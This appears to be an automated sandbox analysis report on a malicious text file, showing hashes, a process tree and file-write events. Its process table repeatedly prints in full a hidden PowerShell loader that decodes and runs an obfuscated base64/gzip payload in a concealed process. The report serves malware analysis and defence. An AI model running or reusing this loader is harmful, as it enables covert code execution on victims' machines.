File name: | maltext.txt |
Full analysis: | https://app.any.run/tasks/47a194dd-0ff7-47de-bfb6-2c04bf41b5b4 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 16:18:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 8CD0087E129EDBB1861017FA3DAC4E41 |
SHA1: | E122659C1A5B054DEC3C0A2029361C1E15EB66DA |
SHA256: | C3737ECF340973A27831164A8516FB371F63FB7CAE59AF042293F52D778152F9 |
SSDEEP: | 48:AV3XW2ka13RHgQSAk0/75G57F6nrSB1FfoypCdH3NaEm+AtXExXrukdNOeuCKCV8:w9hAQSRc5Ginu1FAyKNxGXEZIHbC7Yj |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
900 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\maltext.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3336 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1080 | C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAH+p5VwCA7VWa2+bSBT9nEj5D6iyZFAcPxI3bSJVWsYGG2pcE2wc22utCIxh6uGxMCQm3f73vWNwmqrJbrvSIlvM4z7PPTOXTR65jMSRsFWELyfHRxMndUJBrBW0IdQeO1Q6OoLVWjyYXggfBHElJ0k/Dh0Sra+ve3ma4oiV8+YAMznLcHhHCc5ESfhLmAc4xWef7j5jlwlfhNofzQGN7xxaiRU9xw2wcCZHHt8bxa7DI2laCSVMrP/+e11anXXWTeXP3KGZWLeKjOGw6VFal4SvEnc4LRIs1g3ipnEWb1hzTqKL8+YsypwNHoO1e2xgFsReVpcgC/ilmOVpJOzz4QbKbbEOw0kau7LnpTjL6g1hxU2v1uvfxFXl9yaPGAlxU4sYTuPEwuk9cXHWHDqRR/EN3qxBy2Ipify1JIHYfbzFYi3KKUD5K2bEMX44oPazSuJzJZCasFRqQBlfyNOIvZziUrP+QqBQegmeqvyA29eT45PjzYEnzLick+dUgdHRaj/GEJw4iTOyF/wgtBuCAW4cFqcFTGvTNMfS+glaqEI/pA+N1w10DtIgW7C7cAhrKzsm3hp0qorWdpivvs7LPt6QCPeLyAmJe6Ce+BLIeEPxPsnmQWwMMYn1agN7fUyx7zAOG6/1D2pKSNiTLsoJ9XAqu1CoDKKCGkrfB1NWQqxrkYFDwKicA/lqGyA8PkhXJC8O3vkchOo96mRZQ5jkcOLchmBhh2KvIchRRqotOWfxflj/Fq6RU0ZcJ2MHc2upRLHy1oujjKW5C0WDzKdWgl3iUA5EQxgSD6PCIv7Ba/1FGHoOpXAKwNI9lAFWePoW41RIIcCy7FLTwkwLE4pDENqffJU6Ppzziux78jg+9urfB3igcslbDsQBgWfhQXUtGrOGYJOUwfXBQd0z6D+6f3Z1QCC9FFd1EA/nY4UKxkldw4jTsQJlD0HKIH01jUPkZPiyW14R4puWQtDbSb8FT/wow6OoN6aNrJm91AxPp5bGrIVCRrMg0EhH82FezBR/wtrJx+l0qFv9oZz2d8FG1jJNGaLC7CDZHZJ3to5mM9AjvZH5eafJHgr9W3/Re9Amwa0GjnojX/PhjbTARe1l20dttTeyUKCQtuxb5tDsdpZa6z1F5NHSLHk4f/L35Efpdoe3u6k8NnQ5UD95audc3etvuf5yOxj1lf3c5XNzkSlEAT+KujDtAM/tBM0VdWnaieafPvimPWp11QDBukZ2o8TiqHQ6+n3kPRr0/aMB4Zr2Uid4qfm48GVTlq1FRHlMMxXpu/dmT0aqa9o3IHNjkI2K8u3uQvc3rc6s0C9DH3Gd+Wxw+XGBUnnSsh1fX4Lu2HAp/BHkizTi6ijP48nFaR/0iL47j02I1yBY18iGojwb3Y3PuU1/194S/RTssdNtF6K1ASMZ4rEsLXpr3iXtd/37oHVlcz2w66E8svPpfMjtot1I7nH8IXcT5AnH1/FvAJPSpswi7RZsWtpE0dRL/SpMIH8ay2jPkwXoFOBLBz+LRJ3QvR93rIMfno9ONpCLl5Qx+6NlobZ4zOih7Se7LVGvotvA3LSi+SCW53f3/tCKP5qLyGldzT684XwHwtcycs5unpH5tSZkOGkWOBRIDt3lcKuocapWLWMSE64hivCJscVphCn0aOjih7MpUxq7vFuVrQVaZdnAeD+dwfDi/MWRJDwJSt/a2GHp+noJQcJpx6g5wpHPgkZ7d9FuQ09q77ptyPHn0+rFSSGCoQbvaCUspWG6Nyzx81/bDf5PqKobJ4CX969QfVv7h92fgq/dqNL9Yf37hV+C8xdTnzuEgZwFlybFZcd+BYGKF8++aXYDqPqmevgn6aecnY3hQ+fk+G9SqOON+QoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3216 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAH+p5VwCA7VWa2+bSBT9nEj5D6iyZFAcPxI3bSJVWsYGG2pcE2wc22utCIxh6uGxMCQm3f73vWNwmqrJbrvSIlvM4z7PPTOXTR65jMSRsFWELyfHRxMndUJBrBW0IdQeO1Q6OoLVWjyYXggfBHElJ0k/Dh0Sra+ve3ma4oiV8+YAMznLcHhHCc5ESfhLmAc4xWef7j5jlwlfhNofzQGN7xxaiRU9xw2wcCZHHt8bxa7DI2laCSVMrP/+e11anXXWTeXP3KGZWLeKjOGw6VFal4SvEnc4LRIs1g3ipnEWb1hzTqKL8+YsypwNHoO1e2xgFsReVpcgC/ilmOVpJOzz4QbKbbEOw0kau7LnpTjL6g1hxU2v1uvfxFXl9yaPGAlxU4sYTuPEwuk9cXHWHDqRR/EN3qxBy2Ipify1JIHYfbzFYi3KKUD5K2bEMX44oPazSuJzJZCasFRqQBlfyNOIvZziUrP+QqBQegmeqvyA29eT45PjzYEnzLick+dUgdHRaj/GEJw4iTOyF/wgtBuCAW4cFqcFTGvTNMfS+glaqEI/pA+N1w10DtIgW7C7cAhrKzsm3hp0qorWdpivvs7LPt6QCPeLyAmJe6Ce+BLIeEPxPsnmQWwMMYn1agN7fUyx7zAOG6/1D2pKSNiTLsoJ9XAqu1CoDKKCGkrfB1NWQqxrkYFDwKicA/lqGyA8PkhXJC8O3vkchOo96mRZQ5jkcOLchmBhh2KvIchRRqotOWfxflj/Fq6RU0ZcJ2MHc2upRLHy1oujjKW5C0WDzKdWgl3iUA5EQxgSD6PCIv7Ba/1FGHoOpXAKwNI9lAFWePoW41RIIcCy7FLTwkwLE4pDENqffJU6Ppzziux78jg+9urfB3igcslbDsQBgWfhQXUtGrOGYJOUwfXBQd0z6D+6f3Z1QCC9FFd1EA/nY4UKxkldw4jTsQJlD0HKIH01jUPkZPiyW14R4puWQtDbSb8FT/wow6OoN6aNrJm91AxPp5bGrIVCRrMg0EhH82FezBR/wtrJx+l0qFv9oZz2d8FG1jJNGaLC7CDZHZJ3to5mM9AjvZH5eafJHgr9W3/Re9Amwa0GjnojX/PhjbTARe1l20dttTeyUKCQtuxb5tDsdpZa6z1F5NHSLHk4f/L35Efpdoe3u6k8NnQ5UD95audc3etvuf5yOxj1lf3c5XNzkSlEAT+KujDtAM/tBM0VdWnaieafPvimPWp11QDBukZ2o8TiqHQ6+n3kPRr0/aMB4Zr2Uid4qfm48GVTlq1FRHlMMxXpu/dmT0aqa9o3IHNjkI2K8u3uQvc3rc6s0C9DH3Gd+Wxw+XGBUnnSsh1fX4Lu2HAp/BHkizTi6ijP48nFaR/0iL47j02I1yBY18iGojwb3Y3PuU1/194S/RTssdNtF6K1ASMZ4rEsLXpr3iXtd/37oHVlcz2w66E8svPpfMjtot1I7nH8IXcT5AnH1/FvAJPSpswi7RZsWtpE0dRL/SpMIH8ay2jPkwXoFOBLBz+LRJ3QvR93rIMfno9ONpCLl5Qx+6NlobZ4zOih7Se7LVGvotvA3LSi+SCW53f3/tCKP5qLyGldzT684XwHwtcycs5unpH5tSZkOGkWOBRIDt3lcKuocapWLWMSE64hivCJscVphCn0aOjih7MpUxq7vFuVrQVaZdnAeD+dwfDi/MWRJDwJSt/a2GHp+noJQcJpx6g5wpHPgkZ7d9FuQ09q77ptyPHn0+rFSSGCoQbvaCUspWG6Nyzx81/bDf5PqKobJ4CX969QfVv7h92fgq/dqNL9Yf37hV+C8xdTnzuEgZwFlybFZcd+BYGKF8++aXYDqPqmevgn6aecnY3hQ+fk+G9SqOON+QoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2212 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2416 | C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAH+p5VwCA7VWa2+bSBT9nEj5D6iyZFAcPxI3bSJVWsYGG2pcE2wc22utCIxh6uGxMCQm3f73vWNwmqrJbrvSIlvM4z7PPTOXTR65jMSRsFWELyfHRxMndUJBrBW0IdQeO1Q6OoLVWjyYXggfBHElJ0k/Dh0Sra+ve3ma4oiV8+YAMznLcHhHCc5ESfhLmAc4xWef7j5jlwlfhNofzQGN7xxaiRU9xw2wcCZHHt8bxa7DI2laCSVMrP/+e11anXXWTeXP3KGZWLeKjOGw6VFal4SvEnc4LRIs1g3ipnEWb1hzTqKL8+YsypwNHoO1e2xgFsReVpcgC/ilmOVpJOzz4QbKbbEOw0kau7LnpTjL6g1hxU2v1uvfxFXl9yaPGAlxU4sYTuPEwuk9cXHWHDqRR/EN3qxBy2Ipify1JIHYfbzFYi3KKUD5K2bEMX44oPazSuJzJZCasFRqQBlfyNOIvZziUrP+QqBQegmeqvyA29eT45PjzYEnzLick+dUgdHRaj/GEJw4iTOyF/wgtBuCAW4cFqcFTGvTNMfS+glaqEI/pA+N1w10DtIgW7C7cAhrKzsm3hp0qorWdpivvs7LPt6QCPeLyAmJe6Ce+BLIeEPxPsnmQWwMMYn1agN7fUyx7zAOG6/1D2pKSNiTLsoJ9XAqu1CoDKKCGkrfB1NWQqxrkYFDwKicA/lqGyA8PkhXJC8O3vkchOo96mRZQ5jkcOLchmBhh2KvIchRRqotOWfxflj/Fq6RU0ZcJ2MHc2upRLHy1oujjKW5C0WDzKdWgl3iUA5EQxgSD6PCIv7Ba/1FGHoOpXAKwNI9lAFWePoW41RIIcCy7FLTwkwLE4pDENqffJU6Ppzziux78jg+9urfB3igcslbDsQBgWfhQXUtGrOGYJOUwfXBQd0z6D+6f3Z1QCC9FFd1EA/nY4UKxkldw4jTsQJlD0HKIH01jUPkZPiyW14R4puWQtDbSb8FT/wow6OoN6aNrJm91AxPp5bGrIVCRrMg0EhH82FezBR/wtrJx+l0qFv9oZz2d8FG1jJNGaLC7CDZHZJ3to5mM9AjvZH5eafJHgr9W3/Re9Amwa0GjnojX/PhjbTARe1l20dttTeyUKCQtuxb5tDsdpZa6z1F5NHSLHk4f/L35Efpdoe3u6k8NnQ5UD95audc3etvuf5yOxj1lf3c5XNzkSlEAT+KujDtAM/tBM0VdWnaieafPvimPWp11QDBukZ2o8TiqHQ6+n3kPRr0/aMB4Zr2Uid4qfm48GVTlq1FRHlMMxXpu/dmT0aqa9o3IHNjkI2K8u3uQvc3rc6s0C9DH3Gd+Wxw+XGBUnnSsh1fX4Lu2HAp/BHkizTi6ijP48nFaR/0iL47j02I1yBY18iGojwb3Y3PuU1/194S/RTssdNtF6K1ASMZ4rEsLXpr3iXtd/37oHVlcz2w66E8svPpfMjtot1I7nH8IXcT5AnH1/FvAJPSpswi7RZsWtpE0dRL/SpMIH8ay2jPkwXoFOBLBz+LRJ3QvR93rIMfno9ONpCLl5Qx+6NlobZ4zOih7Se7LVGvotvA3LSi+SCW53f3/tCKP5qLyGldzT684XwHwtcycs5unpH5tSZkOGkWOBRIDt3lcKuocapWLWMSE64hivCJscVphCn0aOjih7MpUxq7vFuVrQVaZdnAeD+dwfDi/MWRJDwJSt/a2GHp+noJQcJpx6g5wpHPgkZ7d9FuQ09q77ptyPHn0+rFSSGCoQbvaCUspWG6Nyzx81/bDf5PqKobJ4CX969QfVv7h92fgq/dqNL9Yf37hV+C8xdTnzuEgZwFlybFZcd+BYGKF8++aXYDqPqmevgn6aecnY3hQ+fk+G9SqOON+QoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3636 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAH+p5VwCA7VWa2+bSBT9nEj5D6iyZFAcPxI3bSJVWsYGG2pcE2wc22utCIxh6uGxMCQm3f73vWNwmqrJbrvSIlvM4z7PPTOXTR65jMSRsFWELyfHRxMndUJBrBW0IdQeO1Q6OoLVWjyYXggfBHElJ0k/Dh0Sra+ve3ma4oiV8+YAMznLcHhHCc5ESfhLmAc4xWef7j5jlwlfhNofzQGN7xxaiRU9xw2wcCZHHt8bxa7DI2laCSVMrP/+e11anXXWTeXP3KGZWLeKjOGw6VFal4SvEnc4LRIs1g3ipnEWb1hzTqKL8+YsypwNHoO1e2xgFsReVpcgC/ilmOVpJOzz4QbKbbEOw0kau7LnpTjL6g1hxU2v1uvfxFXl9yaPGAlxU4sYTuPEwuk9cXHWHDqRR/EN3qxBy2Ipify1JIHYfbzFYi3KKUD5K2bEMX44oPazSuJzJZCasFRqQBlfyNOIvZziUrP+QqBQegmeqvyA29eT45PjzYEnzLick+dUgdHRaj/GEJw4iTOyF/wgtBuCAW4cFqcFTGvTNMfS+glaqEI/pA+N1w10DtIgW7C7cAhrKzsm3hp0qorWdpivvs7LPt6QCPeLyAmJe6Ce+BLIeEPxPsnmQWwMMYn1agN7fUyx7zAOG6/1D2pKSNiTLsoJ9XAqu1CoDKKCGkrfB1NWQqxrkYFDwKicA/lqGyA8PkhXJC8O3vkchOo96mRZQ5jkcOLchmBhh2KvIchRRqotOWfxflj/Fq6RU0ZcJ2MHc2upRLHy1oujjKW5C0WDzKdWgl3iUA5EQxgSD6PCIv7Ba/1FGHoOpXAKwNI9lAFWePoW41RIIcCy7FLTwkwLE4pDENqffJU6Ppzziux78jg+9urfB3igcslbDsQBgWfhQXUtGrOGYJOUwfXBQd0z6D+6f3Z1QCC9FFd1EA/nY4UKxkldw4jTsQJlD0HKIH01jUPkZPiyW14R4puWQtDbSb8FT/wow6OoN6aNrJm91AxPp5bGrIVCRrMg0EhH82FezBR/wtrJx+l0qFv9oZz2d8FG1jJNGaLC7CDZHZJ3to5mM9AjvZH5eafJHgr9W3/Re9Amwa0GjnojX/PhjbTARe1l20dttTeyUKCQtuxb5tDsdpZa6z1F5NHSLHk4f/L35Efpdoe3u6k8NnQ5UD95audc3etvuf5yOxj1lf3c5XNzkSlEAT+KujDtAM/tBM0VdWnaieafPvimPWp11QDBukZ2o8TiqHQ6+n3kPRr0/aMB4Zr2Uid4qfm48GVTlq1FRHlMMxXpu/dmT0aqa9o3IHNjkI2K8u3uQvc3rc6s0C9DH3Gd+Wxw+XGBUnnSsh1fX4Lu2HAp/BHkizTi6ijP48nFaR/0iL47j02I1yBY18iGojwb3Y3PuU1/194S/RTssdNtF6K1ASMZ4rEsLXpr3iXtd/37oHVlcz2w66E8svPpfMjtot1I7nH8IXcT5AnH1/FvAJPSpswi7RZsWtpE0dRL/SpMIH8ay2jPkwXoFOBLBz+LRJ3QvR93rIMfno9ONpCLl5Qx+6NlobZ4zOih7Se7LVGvotvA3LSi+SCW53f3/tCKP5qLyGldzT684XwHwtcycs5unpH5tSZkOGkWOBRIDt3lcKuocapWLWMSE64hivCJscVphCn0aOjih7MpUxq7vFuVrQVaZdnAeD+dwfDi/MWRJDwJSt/a2GHp+noJQcJpx6g5wpHPgkZ7d9FuQ09q77ptyPHn0+rFSSGCoQbvaCUspWG6Nyzx81/bDf5PqKobJ4CX969QfVv7h92fgq/dqNL9Yf37hV+C8xdTnzuEgZwFlybFZcd+BYGKF8++aXYDqPqmevgn6aecnY3hQ+fk+G9SqOON+QoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
576 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQA0NYLLYIJ3CNKJC8A4.temp | — | |
MD5:— | SHA256:— | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TEV3DODZOJPP875ILI35.temp | — | |
MD5:— | SHA256:— | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF129c09.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3636 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF146679.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |